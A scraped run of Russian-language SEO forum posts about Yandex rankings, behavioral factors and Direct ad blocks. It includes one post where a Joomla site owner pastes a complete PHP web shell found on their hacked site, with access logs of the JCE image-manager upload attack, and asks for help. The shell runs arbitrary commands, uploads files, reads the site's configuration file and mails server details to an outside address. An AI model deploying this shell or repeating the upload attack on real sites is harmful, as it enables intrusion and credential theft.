а по &rd=0 пробивали?
Блин, тема стара как мир, хотя тут одна моя знакомая мне с пеной у рта доказывала, что у неё на сайте стоит регион "Россия" поэтому он писец какой продвинутый.
А, то что там трафик по узкоспециальным запросам, (типа "Реле тока м258-ХЗ-М3"), которых так мало, что им даже регион не присвоен, до этого моск ещё не дорос
Чёто не то.
Хостовые это хостовые, а поведенческие это поведенческие.
Если исходить из Вашей логики, то ТОП должен быть забит сайтами визитками с малым количеством страниц. А большие интернет-магазины типа викимарта ну или МВидео, курить в сторонке.
А вы почитайте топик про запрос "натяжные потолки" /ru/forum/778282, там ситуация аналогична вашей. В конце марта перетасовало весь ТОП-100. Причем в нем оказались сайты 2-3х месячного возраста абсолютно без ссылок.
По данному поводу Людкевич как то сделал предположение, http://seopult.tv/programs/runet_events/yandex_protiv_ssylok_ili_novoe_razvitie_seo/ что на этих 2-х запросах "натяжные потолки" и "бюро переводов" Яндекс как раз тестировал отключение внешнего ссылочного.
И я склонен доверять его мнению, потому как у самого сайт в ТОПе гугла по натяжным потолкам, а в Яндексе в опе!
PS если это действительно так, то я представляю, что начнется после полной отмены ссылочного.......
Походу откат идет
Мысль в голову пришла:
А как интересно наличие блоков с Яндекс Директом влияет на кликстрим?
Ведь по сути человек может с Вашего сайта перейти на сайт конкурента и там остаться.
При этом возврата в выдачу нет, пользовательское счастье достигнуто.
Интересно )
Среди некоторых сеошников бытует мнение, что наличие блоков Директа на сайте дает прирост трафика и рост по позициям. Может с этим связано? По крайней мере прямой корреляции тут точно быть не может, иначе все бы ТОПовые сайты были Директом завешаны
Ох сейчас всякая нечисть активизируется! Задолбят своими Мовебами, Серпкликами и прочими Узераторами
Добрый день!
Вскрыли жумловский сайт и разместили закодированный в base64 вот такой файл
@ini_restore("disable_functions");if (!isset($_SESSION['bajak'])) {$visitcount = 0;$web = $_SERVER["HTTP_HOST"];$inj = $_SERVER["REQUEST_URI"];$body = "Shell Injector \n$web$inj";$safem0de = @ini_get('safe_mode');if (!$safem0de) {$security= "SAFE_MODE = OFF";}else {$security= "SAFE_MODE = ON";};$df='ini_get disable!';$serper=gethostbyname($_SERVER['SERVER_ADDR']);$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);mail("peterdlegend@aol.com", "$body","Shell Result http://$web$inj\n$security\nIP Server = $serper\n IP Injector= $injektor");$_SESSION['bajak'] = 0;}else {$_SESSION['bajak']++;};if(isset($_GET['clone'])){$source = $_SERVER['SCRIPT_FILENAME'];$desti =$_SERVER['DOCUMENT_ROOT']."/wp-includes/wp-info.php";rename($source, $desti);}$safem0de = @ini_get('safe_mode');if (!$safem0de) {$security= "SAFE_MODE : OFF";}else {$security= "SAFE_MODE : ON";}echo "<title>Peterson - Shell</title><br>
<br>
";echo "<font size=2 color=#888888><b>".$security."</b><br>
";$cur_user="(".get_current_user().")";echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>
";echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>
";echo "<font size=2 color=#888888><b>Disable Functions : ";$df='ini_get disable!';if((@function_exists('ini_get')) && (''==($df=@ini_get('disable_functions')))){echo "NONE";}else{echo "$df";}function pwd() {$cwd = getcwd();if($u=strrpos($cwd,'/')){if($u!=strlen($cwd)-1){return $cwd.'/';}else{return $cwd;};}elseif($u=strrpos($cwd,'\\')){if($u!=strlen($cwd)-1){return $cwd.'\\';}else{return $cwd;};};}echo '
<form method="POST" action="">
<font size=2 color=#888888><b>Command</b><br>
<input type="text" name="cmd"><input type="Submit" name="command" value="cok">
</form>
';echo '
<form enctype="multipart/form-data" action method=POST>
<font size=2 color=#888888><b>Upload File</b></font><br>
<input type=hidden name="submit"><input type=file name="userfile" size=28><br>
<font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload">
';if(isset($_POST['submit'])){$uploaddir = pwd();if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){echo "Upload Failed";} else { echo "Upload Success to ".$uploaddir.$name." :D "; }}if(isset($_POST['command'])){$cmd = $_POST['cmd'];echo "
<pre>
<font size=3 color=#000000>".shell_exec($cmd)."</font>
</pre>
";}else { echo "
<font size=3 color=#000000>".shell_exec('ls -la')."</font>
";}if(isset($_GET['baca'])){$conf = file_get_contents("../../configuration.php");echo $conf;}
Подскажите, что он делает и как это дело предотвратить, сайт на Joomla
Вот кусок log-файла
www.site.ru 77.222.61.84 - - [10/Feb/2014:17:59:45 +0400] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 200 69 "-" "BOT/0.1 (BOT for JCE)" 0
www.site.ru 77.222.61.84 - - [10/Feb/2014:17:59:53 +0400] "GET //images/stories/petx.gif HTTP/1.1" 200 1580 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" 0
www.site.ru 77.222.61.84 - - [10/Feb/2014:17:59:53 +0400] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 36 "-" "BOT/0.1 (BOT for JCE)" 0
www.site.ru 77.222.61.84 - - [10/Feb/2014:17:59:58 +0400] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 36 "-" "BOT/0.1 (BOT for JCE)" 0
www.site.ru 77.222.61.84 - - [10/Feb/2014:18:00:01 +0400] "GET //images/stories/petx.php?bajak HTTP/1.1" 200 6874 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" 0
www.site.ru 77.222.61.84 - - [10/Feb/2014:18:00:01 +0400] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 36 "-" "BOT/0.1 (BOT for JCE)" 0
www.site.ru 77.222.61.84 - - [10/Feb/2014:18:00:01 +0400] "GET //images/stories/petx.php HTTP/1.1" 200 6874 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" 0
www.site.ru 77.222.61.84 - - [10/Feb/2014:18:00:01 +0400] "GET //images/stories/petx.php?baca HTTP/1.1" 200 9152 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" 0
www.site.ru 77.222.61.84 - - [10/Feb/2014:18:00:16 +0400] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 200 69 "-" "BOT/0.1 (BOT for JCE)" 0
www.site.ru 77.222.61.84 - - [10/Feb/2014:18:00:24 +0400] "GET /component/content//images/stories/petx.gif HTTP/1.1" 404 1107 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" 0
На сайте стоит некий JCE Plugin Manager, как я понимаю вскрыли через него?
У меня требовали сканы договоров аренды с мокрой печатью
Блин, наш болезный опять долбит
